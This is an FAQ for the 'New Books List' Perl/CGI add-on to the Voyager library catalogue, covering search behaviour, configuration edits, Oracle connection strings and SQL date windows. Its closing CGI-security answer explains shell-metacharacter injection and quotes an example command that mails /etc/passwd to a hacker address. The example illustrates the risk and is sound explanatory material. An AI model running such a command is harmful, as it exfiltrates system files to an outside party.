How does the keyword searching work?
The keyword searching facility has not previously been documented
and there are a few wrinkles to how searches are handled. Eventually
I will distribute a "Help page" that will explain it, but here
are the basics...
All keyword searches are regular expression matches against:
1) The title (i.e. the "245" field)
2) The author
3) The display call number
However, the search term must be at least two characters long to
be matched against either the title or author, whereas a
single-character search term will still be matched against the call number.
This allows a patron to retrieve all the new items starting with
(for example) a "Q" or "M" call number without getting a lot of
false return hits on authors and titles. Call numbers longer than
one character are a lot less likely to return false hits against
titles or authors.
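The matching rule described above can be sketched roughly as follows. This is only an illustration, not the code from newbooks.cgi: the keyword_match function, the record field names, and the choice of a case-insensitive, unanchored match are all assumptions.

```perl
use strict;
use warnings;

# Hypothetical helper: returns 1 if $term matches the record under the
# rules described above. Field names are illustrative only.
sub keyword_match {
    my ($term, $rec) = @_;
    return 0 unless defined $term && length $term;

    # Treat the term as a regular expression; reject patterns that
    # do not compile. Case-insensitivity is an assumption.
    my $re = eval { qr/$term/i };
    return 0 unless $re;

    # The call number is always searched.
    return 1 if $rec->{call_number} =~ $re;

    # Title and author are searched only for terms of two or more characters.
    return 0 if length($term) < 2;
    return 1 if $rec->{title} =~ $re || $rec->{author} =~ $re;
    return 0;
}

my %book = (
    title       => 'Quantum mechanics for beginners / by A. Smith',
    author      => 'Smith, A.',
    call_number => 'PS3552 .S65',
);
print keyword_match('Q',  \%book) ? "hit\n" : "miss\n";
print keyword_match('Qu', \%book) ? "hit\n" : "miss\n";
```

With this sample record, the single-character term is tested only against the call number, while the two-character term is also tested against the title and author.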
When a user does an "author" search (I have it in quotes because,
as I've stated above, every search over 1 character gets matched
against all three things) they should get a hit either by searching
"last_name, first_name" or "first_name last_name". The search
will pick up the first syntax by matching against the author value
and the second syntax because it is also matching against author
information in the 245 field.
Occasionally, a search will return entries that don't seem like
matches to the search term. This is because the full 245 field is
no longer displayed in the results, as it was in version 2.0. (For
display, it is now truncated at the "/" character.) So if a search
term matches (for example) on an illustrator's name in the 245
field, it will be retrieved, but that name won't appear in the
author column of the results page. (Clicking on the link to the
actual WebVoyage record will solve those mysteries.)
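To see why such a hit looks like a mystery, here is a minimal sketch of the difference between what is searched and what is displayed. The display_title function and the sample 245 text are illustrative assumptions, not taken from newbooks.cgi.

```perl
use strict;
use warnings;

# Hypothetical helper: the title as shown in the results list, i.e. the
# 245 text up to (not including) the first "/" character.
sub display_title {
    my ($field_245) = @_;
    (my $shown = $field_245) =~ s{\s*/.*\z}{}s;
    return $shown;
}

my $field_245 = 'The wind in the willows / Kenneth Grahame ; illustrated by E. H. Shepard';
my $term      = 'Shepard';

# The search is run against the full field...
print "matched\n" if $field_245 =~ /$term/;
# ...but the displayed title no longer contains the matching text.
print "not shown\n" unless display_title($field_245) =~ /$term/;
```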
The keyword search function was a little added bonus that I didn't
want to clutter up with a lot of user options. I tried to program
it so that a search would return what the user would intuitively
expect it to, regardless of what they plug in as a search term.
I've not done usability testing to determine if I was successful,
but I'm very interested in feedback from the trenches.
Update: Version 4.0 now has a configuration option in newbooks.cgi
to allow for full display of the 245 field, if desired.
Record titles and locations are centered rather than left-justified when viewed with the Internet Explorer 6.0 browser. How can this be fixed?
Internet Explorer 6.0 centers the content in table cells if the table
is placed within a div element that has the align attribute set
to "center." The HTML code of newbooks.cgi has been tweaked so that
pages look OK. The current 4.0 download tarball has the fix. (This
only affected newbooks.cgi; the newbooks.pl program was not changed.)
We're still running Voyager 99.1. Can we use version 3.x of the New Books List?
Yes, with a little tweaking. The newbooks.cgi creates links back to
WebVoyage for each item. These "canned search" links work in 2000.1
but won't work in 99.1 until you adjust that part of the code.
(Endeavor changed the search query syntax between 99.1 and 2000.1.)
Example of code used in New Books List 2.0 (for Voyager 99.1):
/cgi-bin/Pwebrecon.cgi?DB=local&SA1=$isbn_only&BOOL1=as+a+phrase
&FLD1=ISBN+%28ISBN%29&CNT=50+records+per+page
Example of code used in New Books List 3.x (for Voyager 2000.1):
/cgi-bin/Pwebrecon.cgi?DB=local&Search_Arg=ISBN+%22$isbn_only%22
&SL=None&Search_Code=CMD&CNT=10
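If you need to support both releases, one possible approach is to pick the link syntax at run time. The sketch below only reuses the two query strings shown above; the isbn_link function and its version argument are hypothetical and do not exist in newbooks.cgi.

```perl
use strict;
use warnings;

# Hypothetical helper: returns the WebVoyage "canned search" path for an
# ISBN. The query strings are copied from the two examples above.
sub isbn_link {
    my ($isbn_only, $voyager_version) = @_;
    if ($voyager_version eq '99.1') {
        return "/cgi-bin/Pwebrecon.cgi?DB=local&SA1=$isbn_only&BOOL1=as+a+phrase"
             . "&FLD1=ISBN+%28ISBN%29&CNT=50+records+per+page";
    }
    # Default: the 2000.1 command-search syntax.
    return "/cgi-bin/Pwebrecon.cgi?DB=local&Search_Arg=ISBN+%22$isbn_only%22"
         . "&SL=None&Search_Code=CMD&CNT=10";
}

print isbn_link('0123456789', '99.1'),   "\n";
print isbn_link('0123456789', '2000.1'), "\n";
```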
Also, the new books list search form as generated by the newbooks.cgi
program has been designed to mimic the Voyager 2000.1 look. If you
find this to be an aesthetic problem, the newbooks.cgi program
provides a way of disabling the default search form so that you can
create your own.
How can I add a "New Books" tab to all the WebVoyage search screens?
Adding tabs to all the search screens can be accomplished by editing
the Tab_Text entry in the Course_Reserve_Search_Page stanza of the
/m1/voyager/xxxdb/etc/webvoyage/local/opac.ini file.
Replace this:
Tab_Text=Course Reserves
With this:
Tab_Text=Course Reserves</a> </font>
</th></tr></table></td><td> </td>
<td><table border="0" cellspacing="0" cellpadding="0">
<tr><th nowrap bgcolor="#003f7c"> <font
color="#fcf7ea"> <a style="color:#fcf7ea"
href="/cgi-bin/newbooks.cgi">New Books</a>
Note: There shouldn't be any line breaks. You will have to adjust
font, background, and style colors to match your site's scheme.
Credit: This solution comes courtesy of Alan Keely. Thanks Alan!
Can we make the "In Process" message go away, or change it to something else?
I think all you have to do is edit a couple of lines down in the
guts of the newbooks.pl program.
Try replacing occurrences of these lines
else { print OUTFILE " In Process\t"; }
with this
else { print OUTFILE "&nbsp;\t"; }
The no-break-space entity (&nbsp;) will not display, but will
be a placeholder in the cell element of the table when items are
displayed.
Also make sure that $in_process_page = "no" in newbooks.cgi.
I *think* this should do the job without having any unwanted
side effects, but haven't tested it.
We want to change the date range to monthly, going back 6 months... It looks like the newbooks.pl and newbooks.cgi will both need some modifications.
Yes, that can be done and you are right that both programs will
need modification. The University of Rochester has done just that.
(see: http://groucho.lib.rochester.edu/cgi-bin/newbooks.cgi)
I definitely encourage people to modify the programs to suit the
needs of their institutions. As I make enhancements myself, I also
try to keep in mind that the New Books List is only meant to fill
a tiny niche. Do we really want it to do the things that WebVoyage
does much better? Library staff, rather than patrons, are often
the ones that want the longer time periods (as an aid to gathering
statistics). Data like that are probably better obtained via
alternate Voyager reporting options.
Update: I have acceded to numerous requests for this functionality.
Version 4.0 now offers the option of retrieving either 4 months or
4 weeks of new items. -mdd
I get a "Can't locate DBI.pm" error message when I try to run newbooks.pl. What's wrong?
Endeavor installs the DBI.pm and DBD.pm Perl modules as part of the
Voyager 2000.1.x or higher upgrades. It's quite possible that the
error indicates that Perl is simply looking in the wrong place.
Try changing the top line of newbooks.pl from this:
#!/usr/local/bin/perl -w
to this:
#!/usr/bin/perl -w
That way, it will look for modules in the /usr/lib directory rather
than the /usr/local/lib directory. This difference has to do with
where and how Perl was originally installed on a particular server.
If that doesn't solve the problem, verify that you have the DBI.pm
module by running this command:
find /usr -name DBI.pm
If that does not locate the module, you may not have it installed.
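Another way to check is to ask the Perl interpreter itself where it looks. The short script below is a sketch (find_module is a hypothetical helper, not part of the New Books List); run it with each candidate interpreter, e.g. /usr/bin/perl and /usr/local/bin/perl, and compare the results.

```perl
use strict;
use warnings;

# Hypothetical helper: returns the path of the first matching module file
# found in @INC, or nothing if this interpreter cannot see it.
sub find_module {
    my ($module) = @_;
    (my $file = "$module.pm") =~ s{::}{/}g;
    for my $dir (@INC) {
        next if ref $dir;                      # skip code hooks in @INC
        return "$dir/$file" if -e "$dir/$file";
    }
    return;
}

print "Perl interpreter: $^X\n";
print "Module search path:\n";
print "  $_\n" for grep { !ref $_ } @INC;

my $path = find_module('DBI');
print defined $path ? "DBI found at $path\n" : "DBI is not visible to this Perl\n";
```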
We have a split server arrangement. We're trying to run newbooks.pl from one of the Voyager application servers rather than the Voyager database server, but I'm getting Oracle connection errors. How can we make it work?
If you are attempting to run newbooks.pl from a server that's NOT the
Voyager database server, the Oracle connect statement needs to contain
additional information.
Try changing this line:
my $dbh = DBI->connect('dbi:Oracle:', $username, $password)
to this:
my $dbh = DBI->connect('dbi:Oracle:host=host_name;sid=LIBR;port=1521', $username, $password)
Substitute your Voyager server name for "host_name" in the line above.
THIS WILL ONLY WORK IF the correct Oracle components and the Perl
DBI/Oracle DBD modules are already available on the application server.
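If you run the script against more than one server, it may be convenient to build the connect string from variables. This is a sketch only: oracle_dsn is a hypothetical helper, and "LIBR" and 1521 are simply the values from the example above, which may differ at your site.

```perl
use strict;
use warnings;

# Hypothetical helper: builds the remote-connection string shown above.
sub oracle_dsn {
    my (%arg) = @_;
    my $sid  = defined $arg{sid}  ? $arg{sid}  : 'LIBR';   # value from the example
    my $port = defined $arg{port} ? $arg{port} : 1521;     # value from the example
    return "dbi:Oracle:host=$arg{host};sid=$sid;port=$port";
}

my $dsn = oracle_dsn(host => 'host_name');
print "$dsn\n";

# The string would then replace 'dbi:Oracle:' in the connect call, e.g.
#   my $dbh = DBI->connect($dsn, $username, $password)
```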
Why aren't there any government documents in newbooks.txt?
If you choose SQL Option 1 in newbooks.pl, retrieval is based on
acquisitions line items received, so it will not pull any government
documents, because they are not ordered and paid for through acquisitions.
SQL Option 2 is based on the bib item add date, so it should include
government documents.
Update: The original SQL options have been superseded by version
4.0's improved SQL statement, so there is no longer any retrieval
based on acquisitions criteria.
I'm not sure what to use for location "fragments" in the newbooks.ini program. Can you explain what they do?
Each "fragment" is a subset/part/fragment (chosen by you) of the text
strings that are extracted from the xxxdb.location.location_display_name
field of the Voyager database. The fragment is used to do a Perl
regular expression match against the full string. So you simply want to
select a fragment that will match the intended location(s) and not any
other locations.
In UTA's case, for example, "Special" matches all the locations in our
Special Collections department, but will not match any locations in the
branches or the areas of the Central Library not included in Special
Collections. I could probably have used "Collect" as the fragment
instead (it needn't be a whole word).
"Special" will regexp match against these locations:
Special Collections, Floor 6: (Non-circulating)
Special Collections, Floor 6: Garrett (Non-circulating)
etc.
"Science" will regexp match against that branch library's locations:
Science & Engineering Library
Science & Engineering Library: Reserve
Science & Engineering Library: Reference
Again, I could just as easily have used "Engineering" as the location
fragment to match all the locations in the Science & Engineering
Library.
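A quick way to try out a fragment before committing to it is to test it against your own location names. The sketch below uses the UTA location names quoted above; the locations_for helper is hypothetical and is not how the New Books List programs are organized.

```perl
use strict;
use warnings;

my @locations = (
    'Special Collections, Floor 6: (Non-circulating)',
    'Special Collections, Floor 6: Garrett (Non-circulating)',
    'Science & Engineering Library',
    'Science & Engineering Library: Reserve',
    'Science & Engineering Library: Reference',
);

# Hypothetical helper: returns the location names that a fragment matches
# when the fragment is used as a Perl regular expression.
sub locations_for {
    my ($fragment, @names) = @_;
    return grep { $_ =~ /$fragment/ } @names;
}

for my $fragment ('Special', 'Collect', 'Engineering') {
    my @hits = locations_for($fragment, @locations);
    printf "%-12s matches %d location(s)\n", $fragment, scalar @hits;
}
```

Because the fragment is treated as a regular expression, a fragment containing characters such as parentheses would need them escaped to be matched literally.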
Many of the items in our list have not been cataloged yet. Is there a way of reducing the proportion of "In Process" items?
You might want to consider adjusting the date range for items that
are extracted. The default is a four-week window that ranges
from 1 week ago to 5 weeks ago.
You could slide that four-week window so it covers from 2 weeks ago
to 6 weeks ago. With a two-week rather than a one-week cushion,
more items should have made it to the shelves.
To accomplish that you will need to edit newbooks.pl...
change this line:
(ceil ((sysdate - status_date) / 7) - 1)
to this:
(ceil ((sysdate - status_date) / 7) - 2)
change this line:
(status_date between (sysdate - 35) and (sysdate - 7))
to this:
(status_date between (sysdate - 42) and (sysdate - 14))
change this line:
(ceil ((sysdate - $db_name.bib_item.add_date) / 7) - 1)
to this:
(ceil ((sysdate - $db_name.bib_item.add_date) / 7) - 2)
change this line:
($db_name.bib_item.add_date between (sysdate - 35) and (sysdate - 7))
to this:
($db_name.bib_item.add_date between (sysdate - 42) and (sysdate - 14))
Update: This solution has been incorporated into version 4.0 as the
"lag time" option. -mdd
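The arithmetic behind those edits can be sketched as follows, which may help if you want a cushion other than one or two weeks. The window_offsets function is a hypothetical illustration and does not appear in newbooks.pl.

```perl
use strict;
use warnings;

# Hypothetical helper: for a cushion of $lag_weeks and a window of
# $window_weeks (default 4), returns the three numbers used in the SQL
# fragments above: the value subtracted after ceil(), then the older and
# newer day offsets from sysdate.
sub window_offsets {
    my ($lag_weeks, $window_weeks) = @_;
    $window_weeks = 4 unless defined $window_weeks;
    my $newest_days = 7 * $lag_weeks;
    my $oldest_days = 7 * ($lag_weeks + $window_weeks);
    return ($lag_weeks, $oldest_days, $newest_days);
}

for my $lag (1, 2) {
    my ($week_adj, $oldest, $newest) = window_offsets($lag);
    print "lag $lag: ceil(...) - $week_adj, ",
          "between (sysdate - $oldest) and (sysdate - $newest)\n";
}
```

A lag of 1 reproduces the default values (35 and 7) and a lag of 2 reproduces the edited values (42 and 14).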
I would like to use the newbooks.pl script in such a way that it prints to STDOUT, as in "./newbooks.pl > newbooks.txt". This is because I'm maintaining two databases and I would like to use the same script for both.
The easiest way to do this is to set the $out_file variable from
a parameter that is passed to the script. Something similar to
this:
# Require exactly one argument: the output file name.
if (@ARGV != 1) {
    print "Usage: $0 output_file\n";
    exit(1);
} else {
    $out_file = shift;
}
Then you would run it like this: ./newbooks.pl newbooks.txt
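If you really do want the redirect form (./newbooks.pl > newbooks.txt), one possibility is to fall back to STDOUT when no file name is given. This is an untested sketch: open_output is a hypothetical helper, and the existing print OUTFILE statements in newbooks.pl would have to be changed to use the returned filehandle.

```perl
use strict;
use warnings;

# Hypothetical helper: returns a filehandle for the named file, or STDOUT
# when no file name is supplied.
sub open_output {
    my ($path) = @_;
    return \*STDOUT unless defined $path && length $path;
    open(my $fh, '>', $path) or die "Cannot write $path: $!\n";
    return $fh;
}

# With an argument, write to that file; without one, write to STDOUT.
my $out = open_output($ARGV[0]);
print {$out} "sample line\n";
```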
My system administrator is concerned about the security of the newbooks.cgi program. Do we have anything to worry about?
Here are some relevant questions to ask regarding CGI scripts...
1) What does the CGI script do with user input?
The most common CGI exploit is for an attacker to include shell
metacharacters in form input as a way of running system commands on
the web server. If the script itself does not attempt to run any
system commands using form input, then form data containing shell
metacharacters is not a concern. (A common example of a system
command in CGI scripts is invoking a Unix mail program.)
If a script *does* use user supplied input (i.e. data included in
the name/value pairs read in from the form) somewhere in a system
call, then yes, there should be concern. In newbooks.cgi, the
ReadParse function checks for shell metacharacters and replaces
them with spaces.
If only one piece of user input is a potential security problem,
it is good to subject *it* to closer taint scrutiny. For example,
in newbooks.cgi v. 3.x in which mailx is used, the user-supplied
email address is subjected to this test (which makes sure that
the input is a proper email address):
# ...then check for valid characters
unless ( $mail_address =~ /^\w{1}[\w\-\.]*\@[\w\-\.]+/ ) {
    # if "bad"
    &MailAck("faulty");
}
It's generally better to check input for what it *should* be, rather
than for what it *shouldn't* be. The set of acceptable inputs is small
and can be described completely, whereas the set of unacceptable
inputs is open-ended, so testing for what is allowed is the more
secure evaluation.
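As an illustration of checking for what input should be, here is a sketch of a stricter test than the one quoted above, which anchors only the start of the string. The looks_like_email function and its pattern are assumptions for illustration; they are not the code in newbooks.cgi and are not a full email address parser.

```perl
use strict;
use warnings;

# Hypothetical helper: accepts only addresses made of word characters,
# dots and hyphens on both sides of a single "@". \A and \z anchor both
# ends, so anything trailing the address (spaces, ";", "|", ...) causes
# a rejection. Deliberately conservative.
sub looks_like_email {
    my ($address) = @_;
    return 0 unless defined $address;
    return $address =~ /\A\w[\w.\-]*\@[\w\-]+(?:\.[\w\-]+)+\z/ ? 1 : 0;
}

for my $candidate ('patron@example.edu', 'patron@example.edu; cat /etc/passwd') {
    printf "%-40s %s\n", $candidate,
        looks_like_email($candidate) ? 'accepted' : 'rejected';
}
```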
2) Who is your "httpd" user?
If your Apache web server is properly configured, httpd processes
are owned by the user "nobody" and therefore CGI programs are
executed by "nobody." This means that unless you have world-
writable files and directories, the damage that can be done by a
malicious user is minimal.
They may however still be able to run unintended applications and
read files - the classic example is something along the lines of
'mailx hacker@blackhat.com < /etc/passwd'.
This is not meant to be a comprehensive overview of CGI security;
it is intended to assure you that I was aware of security issues
when the programs were written.